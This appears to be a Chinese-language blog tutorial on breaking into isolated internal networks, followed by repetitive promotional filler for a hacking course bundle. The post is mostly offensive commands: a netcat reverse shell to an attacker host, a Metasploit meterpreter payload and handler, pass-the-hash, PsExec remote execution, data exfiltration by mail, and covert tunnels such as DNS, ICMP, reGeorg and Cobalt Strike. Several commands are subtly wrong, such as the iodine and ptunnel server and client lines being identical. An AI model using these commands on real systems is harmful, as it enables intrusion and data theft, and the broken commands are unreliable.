内网渗透骚操作，从零基础到精通，收藏这篇就够了！

内网渗透骚操作：20招教你突破“与世隔绝”的目标主机

在渗透测试的战场上，突破内网环境那可是个硬茬，尤其是当目标主机“与世隔绝”，压根没法直接连外网的时候。这种情况下，咱们就得拿出各种“骚操作”和神器，在不直接出网的情况下，悄咪咪地渗透进去。今儿个，咱就来好好唠唠，20种常见的突破内网不出网的技巧，保证让你大开眼界！

一、隧道与代理：搭建“秘密通道”

（一）端口转发：流量乾坤大挪移

端口转发这玩意儿，就像是搭了个“桥”，能把流量从中间主机“摆渡”到目标主机，或者反过来，把目标主机的流量“引流”到外网。常见的姿势有：

1. 1. 本地端口转发（Local Port Forwarding）

   加粗： 想象一下，你想访问目标内网里的一台数据库服务器，但又不能直接连。咋办？本地端口转发来帮忙！它能把目标主机的服务通过中间主机，“映射”到你本地的某个端口，让你感觉就像在直接访问本地服务一样。举个栗子，用SSH端口转发来访问目标内网的MySQL：

   ssh -L 3306:192.168.1.100:3306 user@middle_host
   

   这条命令，就把目标主机192.168.1.100的MySQL服务（3306端口）“搬”到了你本地的3306端口。

2. 2. 远程端口转发（Remote Port Forwarding）

   加粗： 要是目标主机“死活”连不上外网，那咱就得反其道而行之，用远程端口转发！它能让目标主机主动把流量“送”到你的主机上。比如：

   ssh -R 8080:localhost:80 user@attack_host
   

   这条命令，就把目标主机本地的HTTP服务（80端口）“反向”转发到了你主机的8080端口。

（二）代理隧道：瞒天过海，暗度陈仓

代理隧道，顾名思义，就是通过已有的主机或服务，偷偷地绕过网络限制。常用的神器有：

1. 3. Socks代理

   加粗： proxychains，这名字听着就霸气！它能让你通过代理服务器，把流量“神不知鬼不觉”地转发出去。比如：

   proxychains nmap -sT -Pn internal_host
   

   这条命令，就是让你通过proxychains，利用代理来扫描内网主机，是不是很酷？

2. 4. HTTP代理

   加粗： 我们可以悄悄上传个代理脚本到目标服务器，然后建立起一条“秘密通道”。reGeorg和Proxifier，就是干这事儿的行家！

（三）DNS隧道：化数据于无形

DNS隧道，这可真是个“高级货”！它利用DNS查询，把数据“藏”在里面，实现与外部的通信。就算HTTP、HTTPS这些流量都被“掐”了，DNS流量通常也“漏网之鱼”。常用的神器有iodine和dnscat2。

1. 5. 使用iodine搭建DNS隧道

   在你的主机上，先启动一个DNS服务器：

   iodine -f -c -P password example.com
   

   然后在目标主机上，启动客户端：

   iodine -f -c -P password example.com
   

   瞧，数据就这样通过DNS隧道，悄无声息地传输啦！

（四）ICMP隧道： “Ping”出一条路

ICMP隧道，就是利用ICMP流量来传输数据，绕过防火墙。有时候，TCP/UDP流量都被“堵死”了，但ICMP（比如Ping命令）可能还“活着”。常用的神器有Ptunnel和icmpsh。

1. 6. 使用Ptunnel搭建ICMP隧道

   在你的主机上，启动Ptunnel：

   ptunnel -p 80 -lp 22 -da 192.168.1.100 -dp 22
   

   然后在目标主机上，启动客户端：

    ptunnel -p 80 -lp 22 -da 192.168.1.100 -dp 22
   

数据传输，就是这么神奇！

二、内网服务： “顺藤摸瓜”

（五）内网横向移动： “步步为营”

内网横向移动，就是利用内网里那些“脆弱”的环节，比如弱口令、没打补丁的漏洞、或者域账户的特权，一步步“拿下”其他内网主机。比如：

1. 7. 使用PsExec远程执行命令

   PsExec.exe \192.168.1.100 -u user -p password cmd.exe
   

   PsExec，让你远程执行命令，轻松“搞定”其他内网主机。

2. 8. Pass-the-Hash攻击

   加粗： 拿到了哈希值？别犹豫，直接用它来认证，绕过密码验证！比如：

   pth-winexe -U user%hash //192.168.1.100 cmd.exe
   

   pth-winexe，Pass-the-Hash攻击的利器！

（六）利用内网服务： “见缝插针”

瞅瞅目标主机有没有啥内网服务，比如数据库服务、文件共享服务啥的，说不定就能从这些服务里找到绕过网络限制的“门路”。

1. 9. 利用内网数据库服务

   加粗： 通过内网数据库服务，咱也能和外部主机“搭上线”。比如，利用MySQL的LOAD DATA INFILE功能，把数据写到文件系统里，再想办法“运”出去。

2. 10. 利用SMB隧道

   加粗： SMB隧道，能让你利用内网文件共享服务来传输数据。比如：

   smbclient //192.168.1.100/share -U user
   

   用SMB客户端访问内网文件共享服务，是不是很方便？

（七）邮件、FTP等协议：“曲线救国”

有些内网环境，可能会把HTTP/HTTPS访问给“禁”了，但没准儿还允许其他协议（比如邮件、FTP）和外部通信。

1. 11. 使用SMTP协议发送邮件

   加粗： 用SMTP协议发个邮件，把数据“捎”出去。比如：

   echo "Data to exfiltrate" | mail -s "Subject" user@example.com
   

   数据就这样，通过SMTP协议，“飞”出去啦！

2. 12. 使用FTP上传或下载文件

   加粗： 用FTP上传或下载文件，也是个不错的选择。比如：

   ftp -i 192.168.1.100
   

   通过FTP上传文件，简单又实用！

三、反向连接：“反客为主”

（八）反向Shell和反向隧道： “主动出击”

反向Shell和反向隧道，就是让目标主机主动来连接你的主机，建立起一条“回连”通道。

1. 13. 使用Netcat建立反向Shell

   在目标主机上，运行：

   nc -e /bin/sh attack_host 4444
   

   在你的主机上，监听：

   nc -l -p 4444
   

   反向Shell，让你轻松连接到目标主机！

2. 14. 使用Metasploit建立反向Shell

   在目标主机上，运行：

   msfvenom -p windows/meterpreter/reverse_tcp LHOST=attack_host LPORT=4444 -f exe -o shell.exe
   

   在你的主机上，运行：

   msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost attack_host; set lport 4444; run"
   

   Metasploit 出场，反向Shell更是不在话下。

（九）Cobalt Strike中转： “借力打力”

Cobalt Strike，内网渗透的“神器”！它的Socks代理功能，能在目标主机不通外网的情况下，通过中转功能建立代理连接。

1. 15. 使用Cobalt Strike的Socks代理

   在目标主机上运行Beacon，然后用Socks代理功能建立代理连接。比如：

   beacon> socks 8080
   

   然后，在你的主机上，用代理工具连接到目标主机，搞定！

（十）SMB Beacon： “隐蔽战线”

SMB Beacon，Cobalt Strike里的“秘密武器”！它通过Windows命名管道来通信，更加隐蔽。

1. 16. 使用SMB Beacon

   创建一个SMB的Listener，然后就能在主Beacon上连接或断开子Beacon。比如：

   beacon> smb 192.168.1.100 445
   

   SMB Beacon，让你的连接更加隐蔽！

四、工具与脚本：“百宝箱”

（十一）reGeorg和Neo-reGeorg： “老牌劲旅”

reGeorg，一款经典的代理隧道工具！你只需把它的脚本上传到目标服务器的网站目录下，就能建立起代理隧道。Neo-reGeorg更是在此基础上加了“buff”，数据传输更隐蔽。

1. 17. 使用reGeorg建立代理隧道

   在目标服务器上，上传reGeorg脚本：

   curl -o proxy.py http://example.com/reGeorg.py
   

   在你的主机上，运行代理客户端：

   python proxy.py -s http://192.168.1.100/reGeorg.py -l 8080 -r 192.168.1.200:80
   

   reGeorg，带你轻松建立代理隧道！

（十二）Pystinger： “WebShell代理”

Pystinger，通过WebShell实现内网SOCK4代理，端口映射能让目标在不出网的情况下“上线”。

1. 18. 使用Pystinger建立代理

   把stinger_server.exe上传到目标服务器，然后在你的公网VPS上运行stinger_client，建立代理连接。比如：

   python stinger_client.py -s 192.168.1.100 -p 8080 -l 8081
   

   （示例中-l参数后跟的是公网VPS监听的端口，-s后跟的是目标内网主机的IP地址和web服务端口）

   Pystinger，让WebShell也能变身代理！

（十三）Frp： “内网穿透利器”

Frp，一款强大的内网穿透工具！在目标主机不通外网的情况下，它能通过已控的双网卡内网服务器，建立起一条“通道”。

1. 19. 使用Frp建立内网穿透

   在目标主机上，运行Frp客户端：

   ./frpc -c frpc.ini
   

   在你的主机上，运行Frp服务端：

   ./frps -c frps.ini
   

   Frp，内网穿透，就是这么简单！

（十四）其他工具和脚本： “锦上添花”

除了上面这些，还有一些其他工具和脚本，也能在突破内网不出网的场景中“大显身手”。

1. 20. 使用Chisel建立隧道

   Chisel，一款轻量级的隧道工具，也能用来内网穿透。比如：

   在目标主机上，运行：

   ./chisel client --reverse attack_host:8080 R:8081:localhost:80
   

   在你的主机上，运行：

   ./chisel server --port 8080 --reverse
   

   Chisel，轻巧又实用！

黑客/网络安全学习包

资料目录

1. 成长路线图&学习规划

2. 配套视频教程

3. SRC&黑客文籍

4. 护网行动资料

5. 黑客必读书单

6. 面试题合集

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享

1.成长路线图&学习规划

要学习一门新的技术，作为新手一定要先学习成长路线图，方向不对，努力白费。

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享

2.视频教程

很多朋友都不喜欢晦涩的文字，我也为大家准备了视频教程，其中一共有21个章节，每个章节都是当前板块的精华浓缩。

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍：

黑客资料由于是敏感资源，这里不能直接展示哦！

4.护网行动资料

其中关于HW护网行动，也准备了对应的资料，这些内容可相当于比赛的金手指！

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里，你就要开始思考找工作的事情了，而工作绕不开的就是真题和面试题。

更多内容为防止和谐，可以扫描获取~

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

****************************优快云大礼包：《黑客&网络安全入门&进阶学习资源包》免费分享